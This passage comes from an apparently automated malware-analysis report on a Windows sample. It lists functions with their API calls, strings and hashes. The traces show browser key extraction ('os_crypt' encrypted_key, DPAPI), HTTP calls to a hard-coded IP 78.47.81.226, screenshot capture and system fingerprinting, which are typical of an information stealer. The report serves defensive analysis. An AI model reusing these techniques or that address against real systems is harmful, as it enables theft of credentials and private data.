                                                                                                                                            • Opcode ID: a97c6bd55508556073287a4861b74b70b98ef01fe9f5bb02f4586120ddb36766
                                                                                                                                            • Instruction ID: 86bfa3b1acd0b878643c3b1e07f1484d69ec719363f1d901ee90d8b239c6531a
                                                                                                                                            • Opcode Fuzzy Hash: a97c6bd55508556073287a4861b74b70b98ef01fe9f5bb02f4586120ddb36766
                                                                                                                                            • Instruction Fuzzy Hash: 2171B071E0022AAFDB10DFA9D94269EBBB0FF08714F90413BE514B7281D7799D50CB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040A51C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset$_strcpy_s
                                                                                                                                            • String ID: 1BEF0A57BE110FD467A
                                                                                                                                            • API String ID: 1261871945-2910601657
                                                                                                                                            • Opcode ID: 67b8df63ad589acad400fc5a330ef383e4801009bc18700666a1c1dd84be3af7
                                                                                                                                            • Instruction ID: ea2972bd4cea0dbef055349db1fa8ce153ba707fd67065e662ffd4032b781845
                                                                                                                                            • Opcode Fuzzy Hash: 67b8df63ad589acad400fc5a330ef383e4801009bc18700666a1c1dd84be3af7
                                                                                                                                            • Instruction Fuzzy Hash: 18F031B0640704AFC720DF65C842B8B7BE4EB09711F40481EF94AD7740E678F9008BA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004612F0, Relevance: 6.1, APIs: 4, Instructions: 100timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00461340
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00461370
                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0046139D
                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 004613AB
                                                                                                                                              • Part of subcall function 00460E1A: GetFileInformationByHandle.KERNEL32(?,?), ref: 00460E4F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3986731826-0
                                                                                                                                            • Opcode ID: c8575ea5987866672f8b39a8423405951b4697c1c56cf68d9da69297e230d613
                                                                                                                                            • Instruction ID: ab3253a657a3e0d2950369bde14509cccfa07bddb8f18f5d5411f12482f0aee3
                                                                                                                                            • Opcode Fuzzy Hash: c8575ea5987866672f8b39a8423405951b4697c1c56cf68d9da69297e230d613
                                                                                                                                            • Instruction Fuzzy Hash: 4A316FB1900B489FD721CF69C8809ABBBF8FB08304B044A2FE597D2760E735E945CB65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00408B5E, Relevance: 6.0, APIs: 4, Instructions: 17sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep$ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3633490160-0
                                                                                                                                            • Opcode ID: 9df592782f198e63792c2a53d47fbec155be64ac946753b6f63415ab8f5d8bb0
                                                                                                                                            • Instruction ID: d0559d949c9daf460bc292c3d7ef987f5c90f5dd7f7ffb64884e7e8035b32449
                                                                                                                                            • Opcode Fuzzy Hash: 9df592782f198e63792c2a53d47fbec155be64ac946753b6f63415ab8f5d8bb0
                                                                                                                                            • Instruction Fuzzy Hash: 5DD05E24A8835892E11137B38E0AB1E3D244F04796F04007B3A84791D2DDB8B840C5BE
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040DF8C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040DF93
                                                                                                                                              • Part of subcall function 0040B614: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040B62C
                                                                                                                                              • Part of subcall function 0040B614: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040B643
                                                                                                                                              • Part of subcall function 0040B614: LocalAlloc.KERNEL32(00000040,?), ref: 0040B65F
                                                                                                                                              • Part of subcall function 0040B614: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040B679
                                                                                                                                              • Part of subcall function 0040B614: FindCloseChangeNotification.KERNEL32(?), ref: 0040B69A
                                                                                                                                              • Part of subcall function 0045CDA7: LocalAlloc.KERNEL32(00000040,00000105,00000000,00000104,0040DFD0,0000000F,?,00000000,?,?,?,?,?,?,?,00000014), ref: 0045CDBF
                                                                                                                                              • Part of subcall function 004027C0: std::_Xinvalid_argument.LIBCPMT ref: 004027D3
                                                                                                                                              • Part of subcall function 004027C0: _memmove.LIBCMT ref: 0040280E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$AllocLocal$ChangeCloseCreateFindH_prolog3_NotificationReadSizeXinvalid_argument_memmovestd::_
                                                                                                                                            • String ID: "os_crypt":{"encrypted_key":"$DPAPI
                                                                                                                                            • API String ID: 3192152120-1727391133
                                                                                                                                            • Opcode ID: 50c873abaea2312b114e82ac3bb661df0ef4d499a097e01c40b2ac6cb063b0cd
                                                                                                                                            • Instruction ID: ef8ece0aa88c54301ae5d66ed1e0a2ec5bbdaa925e2c00bad953da79eed11c7e
                                                                                                                                            • Opcode Fuzzy Hash: 50c873abaea2312b114e82ac3bb661df0ef4d499a097e01c40b2ac6cb063b0cd
                                                                                                                                            • Instruction Fuzzy Hash: 21318D72D00218ABCF18EFA5DD81ADEB775AF14310F24452EF911B22C1EBB99915CB58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00407375, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040737C
                                                                                                                                              • Part of subcall function 004044CB: __EH_prolog3_GS.LIBCMT ref: 004044D5
                                                                                                                                              • Part of subcall function 004044CB: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000814), ref: 004044FB
                                                                                                                                              • Part of subcall function 004044CB: InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00800000,00000001), ref: 00404532
                                                                                                                                              • Part of subcall function 004044CB: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00800000,00000001), ref: 0040455B
                                                                                                                                              • Part of subcall function 004044CB: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040456C
                                                                                                                                              • Part of subcall function 004044CB: InternetReadFile.WININET(00000000,?,000007FF,?), ref: 0040459E
                                                                                                                                              • Part of subcall function 004044CB: InternetCloseHandle.WININET(00000000), ref: 004045A9
                                                                                                                                              • Part of subcall function 004044CB: InternetCloseHandle.WININET(?), ref: 004045B5
                                                                                                                                              • Part of subcall function 004044CB: InternetCloseHandle.WININET(?), ref: 004045C7
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 004027C0: std::_Xinvalid_argument.LIBCPMT ref: 004027D3
                                                                                                                                              • Part of subcall function 004027C0: _memmove.LIBCMT ref: 0040280E
                                                                                                                                            • _strtok.LIBCMT ref: 00407440
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle_memmove$H_prolog3_HttpOpenRequest$ConnectFileReadSendXinvalid_argument_strtokstd::_
                                                                                                                                            • String ID: 78.47.81.226
                                                                                                                                            • API String ID: 1408896863-2326672712
                                                                                                                                            • Opcode ID: 18504208cb1edcf8cad3b2096b7ac072102dca2e41cd2852026af817a9c7b178
                                                                                                                                            • Instruction ID: 4658a44c8fc7910b757f78f8587be7dad548119bb2ee3bf90186df54f0e6a34b
                                                                                                                                            • Opcode Fuzzy Hash: 18504208cb1edcf8cad3b2096b7ac072102dca2e41cd2852026af817a9c7b178
                                                                                                                                            • Instruction Fuzzy Hash: 89217371C00248AEDF05EBA9CD56AEDBB78DF14304F50812EE514772D2DA791A44CBAA
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045CF28, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0045CCBD: GdipAlloc.GDIPLUS(00000010,0045CF44,?,00000000), ref: 0045CCBF
                                                                                                                                              • Part of subcall function 0045CE71: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0045CE88
                                                                                                                                            • GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000), ref: 0045CF65
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Gdip$Image$AllocEncodersFileSaveSize
                                                                                                                                            • String ID: image/jpeg$screenshot.jpg
                                                                                                                                            • API String ID: 2572949680-3715547155
                                                                                                                                            • Opcode ID: a57fa823471d5e7c6c79b2423eab8b58cf275578e3f5a8161ac047761fbf07cd
                                                                                                                                            • Instruction ID: a9212503f6de3e85f1c7687f732393a4f55a43af7580e962d4978d34ecaa18af
                                                                                                                                            • Opcode Fuzzy Hash: a57fa823471d5e7c6c79b2423eab8b58cf275578e3f5a8161ac047761fbf07cd
                                                                                                                                            • Instruction Fuzzy Hash: 2EF09671A00304AFCB00FFA5CD42BAE77E8DF04704F50446AF906E7292EB75EA0487A9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040268A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::exception::exception.LIBCMT ref: 004026B5
                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004026CA
                                                                                                                                              • Part of subcall function 00464B51: _malloc.LIBCMT ref: 00464B6B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                            • String ID: P&@
                                                                                                                                            • API String ID: 4063778783-654259478
                                                                                                                                            • Opcode ID: 0f5a635535f35a0507f69a63124f845394b637d960c48b15000aa32bb49d5870
                                                                                                                                            • Instruction ID: 81a04c306054aa5aca0cf236dbd475d3237cb72674195de946c1963614bf30a1
                                                                                                                                            • Opcode Fuzzy Hash: 0f5a635535f35a0507f69a63124f845394b637d960c48b15000aa32bb49d5870
                                                                                                                                            • Instruction Fuzzy Hash: 02E0653481020CBACF10FE71C8456DE7BA89B00759F20C57BE515951D0E778D6848BA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004611CD, Relevance: 4.6, APIs: 3, Instructions: 86fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove$FileWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 726942401-0
                                                                                                                                            • Opcode ID: 108b8475284ba2591a2292e87e4625bd5022adc797f2dcbe926ea1b648d932ef
                                                                                                                                            • Instruction ID: 2fed61093485a850671880e9d893a3c685ce2faa79eb1e817bfd241bec9d1e71
                                                                                                                                            • Opcode Fuzzy Hash: 108b8475284ba2591a2292e87e4625bd5022adc797f2dcbe926ea1b648d932ef
                                                                                                                                            • Instruction Fuzzy Hash: CD21C3715007009FC724DF66D990A63B7F8BF84704B18492FF446D7A11EA74F844CB6A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045E46A, Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 0045E495
                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0045E4AF
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0045E4B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3183270410-0
                                                                                                                                            • Opcode ID: 4b5810b7531d8d8cc8b3d37f877f254424fc0977bd38cf49c1f0860ade655ea0
                                                                                                                                            • Instruction ID: b81984d9aa9aab1d9f8653d043ce78fe171ff77961b55a6c1687f8b8228911d5
                                                                                                                                            • Opcode Fuzzy Hash: 4b5810b7531d8d8cc8b3d37f877f254424fc0977bd38cf49c1f0860ade655ea0
                                                                                                                                            • Instruction Fuzzy Hash: CD018471600208AFDB10EF69DC849AEB7BCDB45704F00447EE545D3241C6B49E888BA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004629A4, Relevance: 4.5, APIs: 3, Instructions: 42fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00463147,?,C:\Users\,0040730B,?,00000001,00000000), ref: 004629CB
                                                                                                                                            • CloseHandle.KERNEL32(?,00000001,?,?,00000000,00463147,?,C:\Users\,0040730B,?,00000001,00000000), ref: 004629E2
                                                                                                                                            • CloseHandle.KERNEL32(?,00000001,?,?,00000000,00463147,?,C:\Users\,0040730B,?,00000001,00000000), ref: 004629F4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle$FileUnmapView
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 260491571-0
                                                                                                                                            • Opcode ID: 4bec33130610ef55ec5e49381376f66d714b35ec2ae9ebd694439c78d85e0c4c
                                                                                                                                            • Instruction ID: 2e90ab3a7a290099ca8e81e95ff7d57e15ad9e503e212180f16b4b0e4faf539e
                                                                                                                                            • Opcode Fuzzy Hash: 4bec33130610ef55ec5e49381376f66d714b35ec2ae9ebd694439c78d85e0c4c
                                                                                                                                            • Instruction Fuzzy Hash: 08F062B6605B855FC7309F658980813F7D8AB45314704897FD59AC3B01E5B5E8489B15
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040A6E2, Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040A709
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040A725
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040A72C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1065093856-0
                                                                                                                                            • Opcode ID: de6854eb1a926e58e50af1e97f63f00a13a38fd67f61639948001d3f7e710ec2
                                                                                                                                            • Instruction ID: 05cc00db2ea99012d4c5dbce919261354f6dbf4a7b9e59538e47ba46d513e68e
                                                                                                                                            • Opcode Fuzzy Hash: de6854eb1a926e58e50af1e97f63f00a13a38fd67f61639948001d3f7e710ec2
                                                                                                                                            • Instruction Fuzzy Hash: CDF0BB73100304BBD7304B65DC88E67BBFCFB85761F10863AF646A6191D271D851C668
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00464ADA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __getptd_noexit
                                                                                                                                            • String ID: #E
                                                                                                                                            • API String ID: 3074181302-1468018528
                                                                                                                                            • Opcode ID: b8cb4ca9e18bbca92d9dcf16fdff145cf6dfa3963c575f2f6ecd7c6058193213
                                                                                                                                            • Instruction ID: c084cc98d04465d37620c870086df8e24b0a6cf18b89929dda06f93ce7c27ca7
                                                                                                                                            • Opcode Fuzzy Hash: b8cb4ca9e18bbca92d9dcf16fdff145cf6dfa3963c575f2f6ecd7c6058193213
                                                                                                                                            • Instruction Fuzzy Hash: 0EF0F931400218AACF116FE5CC0179A3B949F81738F00060BF975462D1F77DD460CBAB
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045B963, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ComputerName
                                                                                                                                            • String ID: Unknown
                                                                                                                                            • API String ID: 3545744682-1654365787
                                                                                                                                            • Opcode ID: 171fcec07ec8642a16385e5111bad73c3447af2ee69d9b173c2bfb34466b6d13
                                                                                                                                            • Instruction ID: 7fcc3aea834df7ab77dd26dc09df5b0be1dd6c82fe4a16ac92679ee54b5db7ba
                                                                                                                                            • Opcode Fuzzy Hash: 171fcec07ec8642a16385e5111bad73c3447af2ee69d9b173c2bfb34466b6d13
                                                                                                                                            • Instruction Fuzzy Hash: 26011271600618DBCB50DF55DD4569AB7ECFF04308F5084BE9549D3241DB749E4C8FA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045BAFD, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 0045BB21
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentProfile
                                                                                                                                            • String ID: Unknown
                                                                                                                                            • API String ID: 2104809126-1654365787
                                                                                                                                            • Opcode ID: 91757c051c3cf0a7892cc0fca4ae19cbe6651688c1186d030c601826cbd7817b
                                                                                                                                            • Instruction ID: f5d7c191d285290811b440fcc3edf9f661fb769ae8cbab335fb5a20791392a7e
                                                                                                                                            • Opcode Fuzzy Hash: 91757c051c3cf0a7892cc0fca4ae19cbe6651688c1186d030c601826cbd7817b
                                                                                                                                            • Instruction Fuzzy Hash: E2F01270600219DFDB10DF69995196AB7E8EB18349F10447E9542D7241DB74ED088BA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0042E9CC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 0042E9D0
                                                                                                                                              • Part of subcall function 0046632E: __FF_MSGBANNER.LIBCMT ref: 00466347
                                                                                                                                              • Part of subcall function 0046632E: __NMSG_WRITE.LIBCMT ref: 0046634E
                                                                                                                                              • Part of subcall function 0046632E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004644D0,00000001,00000000,?,?,?,0046452E,004026BA), ref: 00466373
                                                                                                                                            Strings
                                                                                                                                            • failed to allocate %u bytes of memory, xrefs: 0042E9E0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                                                            • String ID: failed to allocate %u bytes of memory
                                                                                                                                            • API String ID: 501242067-1168259600
                                                                                                                                            • Opcode ID: 6e4b4378f019eba3b0b317b560d27f9e631deeb8c8b9e808d690e2fecb7f1c33
                                                                                                                                            • Instruction ID: 38a3540964e0c252206ba04f39578af98755a51ba29c2c00418000e4a8149bc4
                                                                                                                                            • Opcode Fuzzy Hash: 6e4b4378f019eba3b0b317b560d27f9e631deeb8c8b9e808d690e2fecb7f1c33
                                                                                                                                            • Instruction Fuzzy Hash: C6C01237F4823167DA213255FC0364F7A404B507A1F46042BF94855264D6294CA053CA
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004028EA, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_catch_memmove
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3914490576-0
                                                                                                                                            • Opcode ID: 612bcb0e535890e303bc21b20e538848279b2fa44aaeda8f129d3d841cf8dea7
                                                                                                                                            • Instruction ID: 6647b792603bb39879a461d7278b828c7021650b8ae48091e86e7762da9e6f30
                                                                                                                                            • Opcode Fuzzy Hash: 612bcb0e535890e303bc21b20e538848279b2fa44aaeda8f129d3d841cf8dea7
                                                                                                                                            • Instruction Fuzzy Hash: CA11E771B00201AFDB24DF18C98576EB7A2AB90710F20462FE855AF2C1C7B5AE408BD9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00461584, Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileRead_memmove
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1325644223-0
                                                                                                                                            • Opcode ID: 3b009c22c1d3e7b9b07edc6e91bcd922ce889622b1e969cd41c15cbe09d4a397
                                                                                                                                            • Instruction ID: 338d21b487b756f3078535648f335abc63cef134520eb107d1e4c182c2d658da
                                                                                                                                            • Opcode Fuzzy Hash: 3b009c22c1d3e7b9b07edc6e91bcd922ce889622b1e969cd41c15cbe09d4a397
                                                                                                                                            • Instruction Fuzzy Hash: 99118236600604AFDB219F66CC05A9B7BE5EF84714F08841EF55A87620EA30F914CB65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00461EA2, Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,00462BE3,?,?), ref: 00461EE4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: 05a14e5b94f1c4d95126ef0bb122b2bb7bda5a95dfe03dc04e66f1adbe547466
                                                                                                                                            • Instruction ID: 51676f8dc6a0285fc298439520623b153b77b0a0b312f0b7cc5c25e891db7aa0
                                                                                                                                            • Opcode Fuzzy Hash: 05a14e5b94f1c4d95126ef0bb122b2bb7bda5a95dfe03dc04e66f1adbe547466
                                                                                                                                            • Instruction Fuzzy Hash: 4701DF71608B449FD3218F3A8888B67FAE8FB49354F04453FF6AAD3261D77458409B2A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00465178, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0046AAAD: __getptd_noexit.LIBCMT ref: 0046AAAD
                                                                                                                                            • __lock_file.LIBCMT ref: 004651BF
                                                                                                                                              • Part of subcall function 004671E3: __lock.LIBCMT ref: 00467208
                                                                                                                                            • __fclose_nolock.LIBCMT ref: 004651CA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2800547568-0
                                                                                                                                            • Opcode ID: 29956607c26f8f756e0f84018129e8b86fd7840c07ef4c653028f8583a963612
                                                                                                                                            • Instruction ID: 5a3587987d4630fbc3bcc873c563c5fdde35098e083a8b546e0d3300f51b9d96
                                                                                                                                            • Opcode Fuzzy Hash: 29956607c26f8f756e0f84018129e8b86fd7840c07ef4c653028f8583a963612
                                                                                                                                            • Instruction Fuzzy Hash: 91F06831C01A15A6D710A77584027DE7BA05F02338F25830FA471961D1EB7C46419A9F
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0046E653, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __lock.LIBCMT ref: 0046E66B
                                                                                                                                              • Part of subcall function 0046F899: __mtinitlocknum.LIBCMT ref: 0046F8AF
                                                                                                                                              • Part of subcall function 0046F899: __amsg_exit.LIBCMT ref: 0046F8BB
                                                                                                                                              • Part of subcall function 0046F899: EnterCriticalSection.KERNEL32(00000000,00000000,?,0046D05A,0000000D), ref: 0046F8C3
                                                                                                                                            • __tzset_nolock.LIBCMT ref: 0046E67C
                                                                                                                                              • Part of subcall function 0046DF72: __lock.LIBCMT ref: 0046DF94
                                                                                                                                              • Part of subcall function 0046DF72: ____lc_codepage_func.LIBCMT ref: 0046DFDB
                                                                                                                                              • Part of subcall function 0046DF72: __getenv_helper_nolock.LIBCMT ref: 0046DFFD
                                                                                                                                              • Part of subcall function 0046DF72: _free.LIBCMT ref: 0046E034
                                                                                                                                              • Part of subcall function 0046DF72: _strlen.LIBCMT ref: 0046E03B
                                                                                                                                              • Part of subcall function 0046DF72: __malloc_crt.LIBCMT ref: 0046E042
                                                                                                                                              • Part of subcall function 0046DF72: _strlen.LIBCMT ref: 0046E058
                                                                                                                                              • Part of subcall function 0046DF72: _strcpy_s.LIBCMT ref: 0046E066
                                                                                                                                              • Part of subcall function 0046DF72: __invoke_watson.LIBCMT ref: 0046E07B
                                                                                                                                              • Part of subcall function 0046DF72: _free.LIBCMT ref: 0046E08A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
